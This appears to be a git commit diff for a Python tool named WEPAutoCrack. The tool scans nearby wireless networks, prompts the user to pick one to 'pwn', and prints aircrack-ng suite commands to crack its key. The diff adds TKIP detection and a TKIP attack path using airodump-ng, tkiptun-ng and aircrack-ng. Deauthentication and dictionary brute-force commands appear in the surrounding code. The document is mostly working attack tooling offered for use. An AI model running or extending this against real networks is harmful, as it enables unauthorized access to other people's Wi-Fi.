aboutsummaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
authorJason A. Donenfeld <Jason@zx2c4.com>2013-10-09 15:04:48 +0200
committerJason A. Donenfeld <Jason@zx2c4.com>2013-10-09 15:04:48 +0200
commitfbd596046beb9758b6d32f95c64c4ec17222ff58 (patch)
treee006d62a155a760582988d331db909fb75875963
parentFix ordering. (diff)
downloadWEPAutoCrack-fbd596046beb9758b6d32f95c64c4ec17222ff58.tar.xz
WEPAutoCrack-fbd596046beb9758b6d32f95c64c4ec17222ff58.zip
Various tweaks and initial incomplete support for tkip attack.
-rwxr-xr-xautocrack.py89
1 files changed, 56 insertions, 33 deletions
diff --git a/autocrack.py b/autocrack.py
index 253a64e..dd80de3 100755
--- a/autocrack.py
+++ b/autocrack.py
@@ -140,6 +140,22 @@ aireplay-ng -0 1 -a BSSID -c CLIENT INTERFACE
== Brute Force ==
cat /usr/share/dict/* | aircrack-ng -w - -b BSSID psk*.cap
"""
+ if "(TKIP)" in network["Encryption"]:
+ instructions += """
+
+---------
+
+Instead of brute forcing it, because this AP supports TKIP, there are possibilities of RC4 vulnerabilities.
+
+=== Capture IVs ==
+airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE
+
+=== TKIP Relay ===
+tkiptun-ng -h MAC -a BSSID -m 80 -n 100 INTERFACE
+
+== Analyze ==
+aircrack-ng -z -b BSSID output*.cap
+"""
else:
instructions = "Wrong encryption type"
@@ -165,7 +181,10 @@ def get_encryption(cell):
if matching_line(cell, "Encryption key:") == "off":
enc = "Open"
else:
+ tkip = False
for line in cell:
+ if "Pairwise Ciphers (1) : TKIP" in line:
+ tkip = True
matching = match(line, "IE:")
if matching != None:
wpa = match(matching, "WPA")
@@ -177,6 +196,8 @@ def get_encryption(cell):
enc = "WPA2"
if enc == "":
enc = "WEP"
+ if tkip:
+ enc += " (TKIP)"
return enc
def get_address(cell):
@@ -261,40 +282,42 @@ def main():
if os.getuid() != 0:
print "You must be root."
return
-
- print "[+] Scanning..."
- proc = subprocess.Popen(["iwlist", sys.argv[1], "scanning"], stdout=subprocess.PIPE)
- cells=[[]]
- parsed_cells=[]
- for line in proc.stdout:
- cell_line = match(line, "Cell ")
- if cell_line != None:
- cells.append([])
- line = cell_line[-27:]
- cells[-1].append(line.rstrip())
- cells = cells[1:]
- for cell in cells:
- parsed_cells.append(parse_cell(cell))
- sort_cells(parsed_cells)
- encrypted_cells = []
- for cell in parsed_cells:
- if cell["Encryption"] != "Open":
- encrypted_cells.append(cell)
-
- if len(encrypted_cells) == 0:
- print "[-] Could not find any wireless networks. Goodbye."
- return
-
- print_cells(encrypted_cells)
- print
- try:
- network = int(raw_input("Which network would you like to pwn? [1-%s] " % len(encrypted_cells)))
- except:
- network = -1
+ while True:
+ print "[+] Scanning..."
+ proc = subprocess.Popen(["iwlist", sys.argv[1], "scanning"], stdout=subprocess.PIPE)
+ cells=[[]]
+ parsed_cells=[]
+ for line in proc.stdout:
+ cell_line = match(line, "Cell ")
+ if cell_line != None:
+ cells.append([])
+ line = cell_line[-27:]
+ cells[-1].append(line.rstrip())
+ cells = cells[1:]
+ for cell in cells:
+ parsed_cells.append(parse_cell(cell))
+ sort_cells(parsed_cells)
+ encrypted_cells = []
+ for cell in parsed_cells:
+ if cell["Encryption"] != "Open":
+ encrypted_cells.append(cell)
- if network > len(encrypted_cells) or network < 1:
+ if len(encrypted_cells) == 0:
+ print "[-] Could not find any wireless networks."
+ time.sleep(2)
+ continue
+
+ print_cells(encrypted_cells)
+ print
+ try:
+ network = int(raw_input("Which network would you like to pwn? [1-%s] [0 to rescan, -1 to quit] " % len(encrypted_cells)))
+ except:
+ network = -1
+ if network > len(encrypted_cells) or network < 0:
+ return
+ if network == 0:
+ continue
+ pwn(sys.argv[1], encrypted_cells[network - 1])
return
- pwn(sys.argv[1], encrypted_cells[network - 1])
-
main()